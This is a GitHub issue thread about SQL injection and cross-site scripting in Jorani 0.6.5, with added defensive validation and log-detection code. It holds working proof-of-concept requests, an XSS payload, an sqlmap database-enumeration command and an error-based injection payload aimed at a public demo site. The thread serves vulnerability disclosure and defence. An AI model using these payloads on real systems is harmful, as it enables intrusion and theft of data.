Multiple Vulnerabilities #254

Closed
JavierOlmedo opened this issue Aug 2, 2018 · 6 comments

JavierOlmedo commented Aug 2, 2018

Hi,

The last version 0.6.5 has multiple critical vulnerabilities, please contact me to solve it.

Thank you!

bbalet self-assigned this Aug 3, 2018
bbalet added the invalid label Aug 3, 2018
bbalet (Owner) commented Aug 3, 2018

Hi,

Sorry to be rude, but I have received many similar messages that all end up with me wasting a lot of time:

  • People running a security scanner without knowing how to configure it; what is false positive; etc.
  • People listing CVE without checking if we are using the feature covered by the CVE.
  • People making mistakes in configuring the system or a 3rd party provider such as LDAP.
  • People giving general concepts without any practical application.

Plus your approach is odd. What do you mean by "multiple"? Why should I contact you to solve these vulnerabilities? It is an OSS; you should file an issue or contact me directly by email (or push a PR).

So I am going to close this issue and ask you to provide facts and numbers.

bbalet closed this as completed Aug 3, 2018
JavierOlmedo (Author) commented Aug 5, 2018

Example of vulnerabilities:

#1 SQLi (enddate parameter)

```http
POST /jorani/leaves/validate HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/jorani/leaves/create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 164
Cookie: wp-settings-time-1=1529879849; _ga=GA1.1.1206826520.1530452462; _utcpl=d66f04aebc05b818647e35827af8c710s1; wire_challenge=tD4NhtqOaauH%2F6JhAnhQjgDy36FLLvIF; language=c0298cb7f7f4378f459f575987ae508c924c00de9cf85a8d58a20d8536543b9ba%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22es%22%3B%7D; em_cdn_uid=t%3D1532802388596%26u%3Da955a24a2e764bb9bb7687ec76e7e814; csrf_cookie_jorani=0d1cad61640cc57dad8f244011bd7304; jorani_session=67oetch8m4dpaq2kqvo68vg9q3mfj7e4; PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304&id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03'&startdatetype=Morning&enddatetype=Afternoon&leave_id=
```

```http
POST /jorani/leaves/validate HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/jorani/leaves/create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 164
Cookie: wp-settings-time-1=1529879849; _ga=GA1.1.1206826520.1530452462; _utcpl=d66f04aebc05b818647e35827af8c710s1; wire_challenge=tD4NhtqOaauH%2F6JhAnhQjgDy36FLLvIF; language=c0298cb7f7f4378f459f575987ae508c924c00de9cf85a8d58a20d8536543b9ba%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22es%22%3B%7D; em_cdn_uid=t%3D1532802388596%26u%3Da955a24a2e764bb9bb7687ec76e7e814; csrf_cookie_jorani=0d1cad61640cc57dad8f244011bd7304; jorani_session=67oetch8m4dpaq2kqvo68vg9q3mfj7e4; PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304&id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03''&startdatetype=Morning&enddatetype=Afternoon&leave_id=
```

#2 XSS (language parameter)

```
/jorani/session/language?csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304&last_page=session%2Flogin&language=enribn7%22%3e%3cscript%3ealert(1)%3c%2fscript%3elq0luluxxvu&login=&CipheredValue=
```
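
The two PoCs above hinge on the same two defects: a date field that reaches the SQL layer with a stray quote, and a language value that is echoed into HTML. As an added example (not Jorani's code, and not from either participant), here is the defensive side in Python: the form bodies and URL quoted in the PoC are parsed, each field is checked against a strict allow-list, and an in-memory SQLite table stands in for the MySQL backend to show why parameter binding (rather than string concatenation) makes the quote harmless even if validation were missed. The `ALLOWED_LANGUAGES` set, the `leaves` table, `GOOD_BODY` and every function name are assumptions of this example; the example goes a step beyond the thread by also covering the two-quote variant of the probe.

```python
import re
import sqlite3
from datetime import date
from urllib.parse import parse_qs, urlsplit

# Request data copied from the PoC above (the CSRF token is the one quoted in
# the issue, not a live value). GOOD_BODY is a constructed benign request.
POC_BODY = (
    "csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304&id=1&type=compensate"
    "&startdate=2018-08-02&enddate=2018-08-03'&startdatetype=Morning"
    "&enddatetype=Afternoon&leave_id="
)
POC_XSS_URL = (
    "/jorani/session/language?csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304"
    "&last_page=session%2Flogin&language=enribn7%22%3e%3cscript%3ealert(1)"
    "%3c%2fscript%3elq0luluxxvu&login=&CipheredValue="
)
GOOD_BODY = (
    "id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03"
    "&startdatetype=Morning&enddatetype=Afternoon&leave_id="
)

ISO_DATE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
ALLOWED_LANGUAGES = {"en", "es", "fr", "de"}  # assumed allow-list, not Jorani's
ALLOWED_DAY_TYPES = {"Morning", "Afternoon"}   # the two values the PoC sends


def parse_form(body: str) -> dict:
    """Decode a form body into name -> value; repeated names are refused so a
    second copy of a field cannot slip past the check on the first."""
    out = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if len(values) != 1:
            raise ValueError(f"parameter {name!r} repeated")
        out[name] = values[0]
    return out


def validate_date(value: str) -> date:
    """Accept only YYYY-MM-DD that is also a real calendar date."""
    if not ISO_DATE.match(value):
        raise ValueError(f"bad date syntax: {value!r}")
    return date.fromisoformat(value)  # raises ValueError for 2018-13-45


def validate_leave_request(body: str) -> dict:
    """Allow-list checks for the fields sent to /leaves/validate."""
    form = parse_form(body)
    start = validate_date(form.get("startdate", ""))
    end = validate_date(form.get("enddate", ""))
    if end < start:
        raise ValueError("enddate precedes startdate")
    for name in ("startdatetype", "enddatetype"):
        if form.get(name) not in ALLOWED_DAY_TYPES:
            raise ValueError(f"bad {name}")
    leave_id = form.get("leave_id", "")
    if leave_id and not leave_id.isdigit():
        raise ValueError("leave_id must be numeric")
    return {"startdate": start, "enddate": end,
            "leave_id": int(leave_id) if leave_id else None}


def validate_language(url: str) -> str:
    """A language code comes from a fixed set; anything else, markup included,
    is refused instead of being written back into the page."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    lang = query.get("language", [""])[0]
    if lang not in ALLOWED_LANGUAGES:
        raise ValueError(f"unknown language {lang!r}")
    return lang


def rejects(check, arg) -> bool:
    """True when the validator refuses the input."""
    try:
        check(arg)
    except ValueError:
        return True
    return False


def _demo_db() -> sqlite3.Connection:
    # Constructed in-memory table standing in for the MySQL schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE leaves (id INTEGER, startdate TEXT, enddate TEXT)")
    conn.execute("INSERT INTO leaves VALUES (1, '2018-08-02', '2018-08-03')")
    return conn


def count_by_enddate(raw_enddate: str) -> int:
    """Bound parameter: a quote inside the value stays data, so the probe
    simply matches no row instead of altering the statement."""
    conn = _demo_db()
    (n,) = conn.execute("SELECT COUNT(*) FROM leaves WHERE enddate = ?",
                        (raw_enddate,)).fetchone()
    conn.close()
    return n


def concat_query_errors(raw_enddate: str) -> bool:
    """String concatenation: one quote breaks the statement (an error instead
    of a normal response), two quotes do not. That difference is the whole
    signal a single-quote probe looks for."""
    conn = _demo_db()
    try:
        conn.execute(f"SELECT COUNT(*) FROM leaves WHERE enddate = '{raw_enddate}'")
    except sqlite3.OperationalError:
        return True
    finally:
        conn.close()
    return False
```

Run `rejects(validate_leave_request, POC_BODY)` and `rejects(validate_language, POC_XSS_URL)` to see both PoC inputs refused at the edge, then compare `count_by_enddate` with `concat_query_errors` on the same `2018-08-03'` value to see why the bound query never produces the error/no-error contrast the probe depends on.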

bbalet (Owner) commented Sep 11, 2018

The XSS vulnerability you gave as an example causes a JavaScript error and the exploiter cannot login, but no damage is done, no data is modified and the exploiter cannot elevate his privileges with this technique.

bbalet (Owner) commented Sep 11, 2018

For the SQL injection I am not sure about what result you got.

First, the exploiter needs:

  1. To know the password of the application.
  2. To know a leave request it can edit.
  3. The MySQL backend is not properly configured with a SQL user dedicated to the database. For example, you are using a root db user.

Imagine that you connect to the demo: https://demo.jorani.org/

And then in the console you execute this code (you need to change the leave id so as to respect rule number 2):

```javascript
$.ajax({
  type: "POST",
  url: 'https://demo.jorani.org/leaves/validate',
  data: {
    id: 1478,
    type: 'compensate',
    startdate: '2018-08-02',
    enddate: "2018-08-03') AND (SELECT 2138 FROM (SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(2138=2138,1))),0x716b716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND('WfLI'='WfLI'",
    startdatetype: 'Morning',
    enddatetype: 'Afternoon',
    leave_id: 1478
  },
  // jQuery's option is `success`, not `done`; with `done` the callback never ran.
  success: function(data) { console.log(data); },
  // Log the status code of a non-200 response so the result is visible either way.
  error: function(xhr) { console.log(xhr.status, xhr.responseText); }
});
```

It is impossible to get a 200 OK code with the payload of your POC for two reasons:

JavierOlmedo (Author) commented:

Hi,

Test XSS (view PoC - anti-csrf not necessary)

Go to --> localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue=

More info:
https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/

Test SQLi

Confirmed by Exploit-DB (Need user)
https://www.exploit-db.com/exploits/45340/

Use sqlmap to exploit with parameters:

```shell
sqlmap -r jorani-poc.req -p enddate --dbms=MySQL --dbs
```

More info:
https://hackpuntes.com/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/
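
For anyone operating an instance while the fix is pending, the two reports above leave a recognisable trace in the web server log: a language value carrying quote or tag characters, and a run of error responses from the leave validation endpoint (the maintainer notes that a syntax-breaking value cannot yield a 200). As an added example, not part of the thread or the project, here is detection logic in Python over a few constructed Apache combined-format lines. The log lines, the `ERROR_BURST_THRESHOLD` value and the assumption that the broken query surfaces as a 5xx status are this example's own; adjust the path and threshold to your deployment.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed log lines (not from any real server). The first GET mirrors the
# shape of the language PoC; the POST run imitates a client alternating a
# syntax-breaking and a well-formed value against /leaves/validate.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Aug/2018:10:00:01 +0200] "GET /jorani/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Aug/2018:10:00:02 +0200] "POST /jorani/leaves/validate HTTP/1.1" 500 612 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Aug/2018:10:00:02 +0200] "POST /jorani/leaves/validate HTTP/1.1" 200 214 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Aug/2018:10:00:03 +0200] "POST /jorani/leaves/validate HTTP/1.1" 500 612 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Aug/2018:10:00:03 +0200] "POST /jorani/leaves/validate HTTP/1.1" 500 612 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Aug/2018:10:05:00 +0200] "GET /jorani/session/language?last_page=session%2Flogin&language=es HTTP/1.1" 200 5001 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Aug/2018:10:05:09 +0200] "POST /jorani/leaves/validate HTTP/1.1" 200 214 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Characters that have no business in a date or a language code.
META = re.compile(r"""['"<>]""")
VALIDATE_PATH = "/jorani/leaves/validate"
ERROR_BURST_THRESHOLD = 3  # assumed tuning value


def parse_line(line: str):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def probed_params(target: str) -> list:
    """Query parameters whose decoded value carries quote or tag characters.
    Decoding comes first so %22%3E is examined as the \"> it turns into."""
    query = urlsplit(target).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if META.search(value)]


def analyze(log_text: str) -> dict:
    """Two signals per client: parameter-level probes in GET query strings,
    and repeated server errors from the leave validation endpoint (POST
    bodies are not in an access log, so the status pattern is the proxy)."""
    probes = []
    errors = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name in probed_params(rec["target"]):
            probes.append((rec["ip"], name))
        if urlsplit(rec["target"]).path == VALIDATE_PATH and rec["status"] >= 500:
            errors[rec["ip"]] += 1
    bursts = sorted(ip for ip, n in errors.items() if n >= ERROR_BURST_THRESHOLD)
    return {"param_probes": probes, "error_bursts": bursts}


if __name__ == "__main__":
    for key, hits in analyze(SAMPLE_LOG).items():
        print(key, hits)
```

On the sample, `analyze` reports the `language` probe from 192.0.2.10 and flags the same client for the error burst, while the ordinary user at 198.51.100.7 produces nothing. The burst rule is deliberately coarse; pair it with the application's own error log, which records the failing statement, before acting on it.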

blablablabc commented:

Hi,

The latest stable version is still vulnerable to these vulnerabilities: https://github.com/bbalet/jorani/releases/download/v0.6.5/jorani-0.6.5.zip

I advise you to create a new archive that no longer contains these vulnerabilities.

Regards,

abc
